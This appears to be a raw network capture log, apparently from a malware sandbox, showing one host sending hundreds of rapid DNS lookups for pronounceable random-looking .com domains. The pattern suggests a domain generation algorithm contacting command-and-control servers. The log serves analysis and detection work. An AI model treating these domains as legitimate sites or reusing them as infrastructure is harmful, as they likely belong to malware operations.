Nov 11, 2024 18:13:42.306288958 CET	192.168.2.6	1.1.1.1	0xf26	Standard query (0)	vonycum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.307867050 CET	192.168.2.6	1.1.1.1	0xdcfe	Standard query (0)	lykywid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.412239075 CET	192.168.2.6	1.1.1.1	0x3002	Standard query (0)	vocycuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.428751945 CET	192.168.2.6	1.1.1.1	0x201b	Standard query (0)	qeqyvig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.430495977 CET	192.168.2.6	1.1.1.1	0x904	Standard query (0)	gahykih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.430655956 CET	192.168.2.6	1.1.1.1	0xab59	Standard query (0)	puvypul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.430828094 CET	192.168.2.6	1.1.1.1	0x806d	Standard query (0)	qetynev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.430953979 CET	192.168.2.6	1.1.1.1	0x3084	Standard query (0)	vojykom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.431108952 CET	192.168.2.6	1.1.1.1	0xd294	Standard query (0)	lyvysur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.431238890 CET	192.168.2.6	1.1.1.1	0x7040	Standard query (0)	gatynes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.431387901 CET	192.168.2.6	1.1.1.1	0xf4f9	Standard query (0)	pujylog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.431524038 CET	192.168.2.6	1.1.1.1	0xe84	Standard query (0)	vopymyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.445746899 CET	192.168.2.6	1.1.1.1	0xf29a	Standard query (0)	qebysul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.462181091 CET	192.168.2.6	1.1.1.1	0xeac5	Standard query (0)	vofyqit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.482604027 CET	192.168.2.6	1.1.1.1	0xdfec	Standard query (0)	lykylan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.730587006 CET	192.168.2.6	1.1.1.1	0x17a1	Standard query (0)	lygywor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.730954885 CET	192.168.2.6	1.1.1.1	0xfbaf	Standard query (0)	qegykiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.731118917 CET	192.168.2.6	1.1.1.1	0xaa38	Standard query (0)	lygyjuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.731280088 CET	192.168.2.6	1.1.1.1	0x5333	Standard query (0)	gacycus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.731415987 CET	192.168.2.6	1.1.1.1	0x9f06	Standard query (0)	pufywil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.731558084 CET	192.168.2.6	1.1.1.1	0xc031	Standard query (0)	qeqyfaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.731693029 CET	192.168.2.6	1.1.1.1	0xcb31	Standard query (0)	purygeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.079340935 CET	192.168.2.6	1.1.1.1	0x9313	Standard query (0)	vonydik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.085671902 CET	192.168.2.6	1.1.1.1	0xbe2c	Standard query (0)	pupymyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.086635113 CET	192.168.2.6	1.1.1.1	0xcf6a	Standard query (0)	pupygel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.087475061 CET	192.168.2.6	1.1.1.1	0xf14b	Standard query (0)	ganydiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.088430882 CET	192.168.2.6	1.1.1.1	0xb21	Standard query (0)	qexytep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.092227936 CET	192.168.2.6	1.1.1.1	0xb46f	Standard query (0)	vowybof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.093341112 CET	192.168.2.6	1.1.1.1	0x5314	Standard query (0)	gacypyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.094630003 CET	192.168.2.6	1.1.1.1	0xec43	Standard query (0)	gaqyvob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.147389889 CET	192.168.2.6	1.1.1.1	0x6e47	Standard query (0)	lyrygyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.147696018 CET	192.168.2.6	1.1.1.1	0x88e7	Standard query (0)	pufyjuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.147874117 CET	192.168.2.6	1.1.1.1	0x709c	Standard query (0)	lyxyxyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.148047924 CET	192.168.2.6	1.1.1.1	0x33b5	Standard query (0)	qegyrol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.148199081 CET	192.168.2.6	1.1.1.1	0xcfe8	Standard query (0)	vowygem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.149152994 CET	192.168.2.6	1.1.1.1	0x3229	Standard query (0)	gahyraw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.149405003 CET	192.168.2.6	1.1.1.1	0x407f	Standard query (0)	qexyxuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.149841070 CET	192.168.2.6	1.1.1.1	0xa3d5	Standard query (0)	qekylag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.150495052 CET	192.168.2.6	1.1.1.1	0xb88d	Standard query (0)	vocypyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.150995016 CET	192.168.2.6	1.1.1.1	0xbc75	Standard query (0)	vofyjuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.151361942 CET	192.168.2.6	1.1.1.1	0xdbc6	Standard query (0)	gadyquz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.152232885 CET	192.168.2.6	1.1.1.1	0xc49c	Standard query (0)	gaqyfah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.152499914 CET	192.168.2.6	1.1.1.1	0x5ca8	Standard query (0)	lymyfoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.152717113 CET	192.168.2.6	1.1.1.1	0xfacc	Standard query (0)	lysymux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.154649019 CET	192.168.2.6	1.1.1.1	0x146d	Standard query (0)	lyxytex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.155123949 CET	192.168.2.6	1.1.1.1	0x900c	Standard query (0)	volyzef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.156533003 CET	192.168.2.6	1.1.1.1	0xd601	Standard query (0)	qedyqup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.156696081 CET	192.168.2.6	1.1.1.1	0xe878	Standard query (0)	pumydoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.189922094 CET	192.168.2.6	1.1.1.1	0x558c	Standard query (0)	lyrynad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.190146923 CET	192.168.2.6	1.1.1.1	0x7bc	Standard query (0)	purybav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.190339088 CET	192.168.2.6	1.1.1.1	0xe3a8	Standard query (0)	ganycuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.190656900 CET	192.168.2.6	1.1.1.1	0x516e	Standard query (0)	galyzeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.204962015 CET	192.168.2.6	1.1.1.1	0xa15f	Standard query (0)	qekyrov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.205225945 CET	192.168.2.6	1.1.1.1	0xe34e	Standard query (0)	puzyxyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.252922058 CET	192.168.2.6	1.1.1.1	0xda70	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.754741907 CET	192.168.2.6	1.1.1.1	0xef86	Standard query (0)	qexyriq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.756254911 CET	192.168.2.6	1.1.1.1	0xe09c	Standard query (0)	vowycut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.759484053 CET	192.168.2.6	1.1.1.1	0x1dcb	Standard query (0)	lygyged.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.766668081 CET	192.168.2.6	1.1.1.1	0x1f10	Standard query (0)	pujywiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.793488979 CET	192.168.2.6	1.1.1.1	0xf3cf	Standard query (0)	puvytag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.796132088 CET	192.168.2.6	1.1.1.1	0x7d4	Standard query (0)	gahyhys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.808659077 CET	192.168.2.6	1.1.1.1	0xa2ed	Standard query (0)	lyryvur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.809365988 CET	192.168.2.6	1.1.1.1	0x1c5a	Standard query (0)	vocyrom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.835850000 CET	192.168.2.6	1.1.1.1	0xd18d	Standard query (0)	qebyteg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.836468935 CET	192.168.2.6	1.1.1.1	0xb666	Standard query (0)	gacyroh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.841629028 CET	192.168.2.6	1.1.1.1	0x5193	Standard query (0)	vonypyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.863404989 CET	192.168.2.6	1.1.1.1	0x1250	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.900897026 CET	192.168.2.6	1.1.1.1	0x57d	Standard query (0)	pumypyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.902214050 CET	192.168.2.6	1.1.1.1	0x2378	Standard query (0)	volykit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.902412891 CET	192.168.2.6	1.1.1.1	0xa3d5	Standard query (0)	lyvytan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.903104067 CET	192.168.2.6	1.1.1.1	0x6012	Standard query (0)	gacyzaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.903414965 CET	192.168.2.6	1.1.1.1	0xe4e8	Standard query (0)	purydip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.925777912 CET	192.168.2.6	1.1.1.1	0xf15b	Standard query (0)	qetyvil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.927095890 CET	192.168.2.6	1.1.1.1	0x86d	Standard query (0)	lyryfox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.927439928 CET	192.168.2.6	1.1.1.1	0xe775	Standard query (0)	galykiz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.927759886 CET	192.168.2.6	1.1.1.1	0xf3bd	Standard query (0)	purycul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.928107977 CET	192.168.2.6	1.1.1.1	0x945a	Standard query (0)	vopybok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.928581953 CET	192.168.2.6	1.1.1.1	0x1800	Standard query (0)	lykyjux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.929074049 CET	192.168.2.6	1.1.1.1	0xee13	Standard query (0)	pupyboq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.929349899 CET	192.168.2.6	1.1.1.1	0x3b5e	Standard query (0)	ganypeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.929680109 CET	192.168.2.6	1.1.1.1	0xbf81	Standard query (0)	puzylol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.929821014 CET	192.168.2.6	1.1.1.1	0xfab9	Standard query (0)	qekykup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.930140018 CET	192.168.2.6	1.1.1.1	0x54a9	Standard query (0)	gaqycyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.930180073 CET	192.168.2.6	1.1.1.1	0xac44	Standard query (0)	gaqydus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.930428982 CET	192.168.2.6	1.1.1.1	0xaa63	Standard query (0)	lysyfin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.931241035 CET	192.168.2.6	1.1.1.1	0xaab3	Standard query (0)	vofymem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.931396008 CET	192.168.2.6	1.1.1.1	0x5cf5	Standard query (0)	qegyqug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.931651115 CET	192.168.2.6	1.1.1.1	0x403b	Standard query (0)	pujyjup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.931752920 CET	192.168.2.6	1.1.1.1	0x1ccd	Standard query (0)	gatyviw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.932243109 CET	192.168.2.6	1.1.1.1	0x1fd5	Standard query (0)	vojyjyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.933358908 CET	192.168.2.6	1.1.1.1	0x55aa	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.934614897 CET	192.168.2.6	1.1.1.1	0x430e	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.937037945 CET	192.168.2.6	1.1.1.1	0xabd4	Standard query (0)	lymysud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.939377069 CET	192.168.2.6	1.1.1.1	0x7793	Standard query (0)	gadyneh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.946594000 CET	192.168.2.6	1.1.1.1	0x708b	Standard query (0)	vocyzek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.946866989 CET	192.168.2.6	1.1.1.1	0x1fac	Standard query (0)	qedyfog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.948488951 CET	192.168.2.6	1.1.1.1	0xa703	Standard query (0)	qeqysuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.952105045 CET	192.168.2.6	1.1.1.1	0x93d8	Standard query (0)	puzywuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.952251911 CET	192.168.2.6	1.1.1.1	0x33c4	Standard query (0)	galyquw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.952400923 CET	192.168.2.6	1.1.1.1	0x7e0a	Standard query (0)	gadyfob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.953125000 CET	192.168.2.6	1.1.1.1	0x5edb	Standard query (0)	vofygaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.953299046 CET	192.168.2.6	1.1.1.1	0xe72e	Standard query (0)	gahyqub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.953950882 CET	192.168.2.6	1.1.1.1	0xb70b	Standard query (0)	qetyfop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.955828905 CET	192.168.2.6	1.1.1.1	0xf08c	Standard query (0)	vojyquf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.956159115 CET	192.168.2.6	1.1.1.1	0x7bf0	Standard query (0)	lyvyxyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.969995022 CET	192.168.2.6	1.1.1.1	0x1bac	Standard query (0)	puvyxeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.970907927 CET	192.168.2.6	1.1.1.1	0xc4b4	Standard query (0)	lygymyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.971086025 CET	192.168.2.6	1.1.1.1	0x232c	Standard query (0)	gatyfaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.971230984 CET	192.168.2.6	1.1.1.1	0xe3e3	Standard query (0)	lyxywij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.971422911 CET	192.168.2.6	1.1.1.1	0x6ca9	Standard query (0)	vonyzac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.972134113 CET	192.168.2.6	1.1.1.1	0xb096	Standard query (0)	lysynaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.972274065 CET	192.168.2.6	1.1.1.1	0xadce	Standard query (0)	lyxylor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.972400904 CET	192.168.2.6	1.1.1.1	0x508f	Standard query (0)	pufymyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.972539902 CET	192.168.2.6	1.1.1.1	0xf887	Standard query (0)	qexylal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.972682953 CET	192.168.2.6	1.1.1.1	0x384e	Standard query (0)	qeqyxyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.972820997 CET	192.168.2.6	1.1.1.1	0x11d5	Standard query (0)	vowydic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.975052118 CET	192.168.2.6	1.1.1.1	0x5890	Standard query (0)	volyquk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.978091002 CET	192.168.2.6	1.1.1.1	0x309a	Standard query (0)	lymyxex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.978276014 CET	192.168.2.6	1.1.1.1	0x8c31	Standard query (0)	pumyxep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.978451967 CET	192.168.2.6	1.1.1.1	0xb28e	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.978678942 CET	192.168.2.6	1.1.1.1	0x182f	Standard query (0)	qedynaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.981163979 CET	192.168.2.6	1.1.1.1	0xfe20	Standard query (0)	qegyhev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.988523006 CET	192.168.2.6	1.1.1.1	0xe9bd	Standard query (0)	pufygav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.994539976 CET	192.168.2.6	1.1.1.1	0xd379	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.997380972 CET	192.168.2.6	1.1.1.1	0x2abc	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.999507904 CET	192.168.2.6	1.1.1.1	0x820b	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.012639046 CET	192.168.2.6	1.1.1.1	0x260	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.014154911 CET	192.168.2.6	1.1.1.1	0x8528	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.393692970 CET	192.168.2.6	1.1.1.1	0x96d	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.394556046 CET	192.168.2.6	1.1.1.1	0xf074	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.395746946 CET	192.168.2.6	1.1.1.1	0x1ab9	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.399842978 CET	192.168.2.6	1.1.1.1	0x9db1	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.437551975 CET	192.168.2.6	1.1.1.1	0xa346	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.437711954 CET	192.168.2.6	1.1.1.1	0xf597	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.437865019 CET	192.168.2.6	1.1.1.1	0x5863	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.438035965 CET	192.168.2.6	1.1.1.1	0x988e	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.438180923 CET	192.168.2.6	1.1.1.1	0x7f84	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.438565016 CET	192.168.2.6	1.1.1.1	0x6abe	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.438747883 CET	192.168.2.6	1.1.1.1	0xa417	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.438977957 CET	192.168.2.6	1.1.1.1	0xf6d9	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.439832926 CET	192.168.2.6	1.1.1.1	0x35e5	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.439985991 CET	192.168.2.6	1.1.1.1	0x8122	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.440330982 CET	192.168.2.6	1.1.1.1	0xbf7e	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.482620001 CET	192.168.2.6	1.1.1.1	0xab6c	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.482765913 CET	192.168.2.6	1.1.1.1	0x1802	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.482917070 CET	192.168.2.6	1.1.1.1	0x3c04	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.483056068 CET	192.168.2.6	1.1.1.1	0xa6a0	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.489440918 CET	192.168.2.6	1.1.1.1	0xd068	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.489697933 CET	192.168.2.6	1.1.1.1	0x5db5	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.490088940 CET	192.168.2.6	1.1.1.1	0x468e	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.490276098 CET	192.168.2.6	1.1.1.1	0x1b4a	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.490698099 CET	192.168.2.6	1.1.1.1	0x992	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.490854025 CET	192.168.2.6	1.1.1.1	0x302e	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.499761105 CET	192.168.2.6	1.1.1.1	0x919b	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.501912117 CET	192.168.2.6	1.1.1.1	0xe107	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.502621889 CET	192.168.2.6	1.1.1.1	0xc90a	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.505115032 CET	192.168.2.6	1.1.1.1	0xa18b	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.569621086 CET	192.168.2.6	1.1.1.1	0x4797	Standard query (0)	lymylij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.573297977 CET	192.168.2.6	1.1.1.1	0xa126	Standard query (0)	pufydul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.575357914 CET	192.168.2.6	1.1.1.1	0x3a33	Standard query (0)	lyxymed.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.575870037 CET	192.168.2.6	1.1.1.1	0xf44b	Standard query (0)	gadyduz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.580663919 CET	192.168.2.6	1.1.1.1	0xd0cc	Standard query (0)	vowyzam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.601624966 CET	192.168.2.6	1.1.1.1	0x26ae	Standard query (0)	qeqyloq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.602355957 CET	192.168.2.6	1.1.1.1	0xea04	Standard query (0)	qegyfil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.603753090 CET	192.168.2.6	1.1.1.1	0xf948	Standard query (0)	puzymev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.619992018 CET	192.168.2.6	1.1.1.1	0x9ad4	Standard query (0)	gahyfow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.663028955 CET	192.168.2.6	1.1.1.1	0x93ce	Standard query (0)	lyryxen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.853296041 CET	192.168.2.6	1.1.1.1	0xd341	Standard query (0)	gaqypew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.853353977 CET	192.168.2.6	1.1.1.1	0xbe3f	Standard query (0)	gahynaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.853818893 CET	192.168.2.6	1.1.1.1	0xa529	Standard query (0)	qebyrip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.853955984 CET	192.168.2.6	1.1.1.1	0x1fd0	Standard query (0)	puvyliv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.854554892 CET	192.168.2.6	1.1.1.1	0xa6fc	Standard query (0)	puzyjyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.855170012 CET	192.168.2.6	1.1.1.1	0xfe0c	Standard query (0)	qebylov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.855472088 CET	192.168.2.6	1.1.1.1	0x717	Standard query (0)	vocykif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.855586052 CET	192.168.2.6	1.1.1.1	0x9bbd	Standard query (0)	vocyquc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.855935097 CET	192.168.2.6	1.1.1.1	0x842b	Standard query (0)	lygyfir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.856555939 CET	192.168.2.6	1.1.1.1	0xf2c0	Standard query (0)	lyvywux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.857222080 CET	192.168.2.6	1.1.1.1	0xbc61	Standard query (0)	vojygok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.857290030 CET	192.168.2.6	1.1.1.1	0x4c81	Standard query (0)	pujygaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.857431889 CET	192.168.2.6	1.1.1.1	0x8089	Standard query (0)	vowypek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.858385086 CET	192.168.2.6	1.1.1.1	0x3a0d	Standard query (0)	gatyduh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.859189987 CET	192.168.2.6	1.1.1.1	0x3c7	Standard query (0)	vojymet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.861639977 CET	192.168.2.6	1.1.1.1	0x896e	Standard query (0)	gatycyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.862200975 CET	192.168.2.6	1.1.1.1	0x952e	Standard query (0)	qeqytal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.862407923 CET	192.168.2.6	1.1.1.1	0xf4a3	Standard query (0)	lymytar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.869065046 CET	192.168.2.6	1.1.1.1	0x82d3	Standard query (0)	ganyzas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.869899035 CET	192.168.2.6	1.1.1.1	0x56ff	Standard query (0)	gacykub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.870059967 CET	192.168.2.6	1.1.1.1	0x1a7c	Standard query (0)	qexyqyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.870204926 CET	192.168.2.6	1.1.1.1	0xc682	Standard query (0)	qekyheq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.870835066 CET	192.168.2.6	1.1.1.1	0x49af	Standard query (0)	qetysuq.com	A (IP address)	IN (0x0001)	false
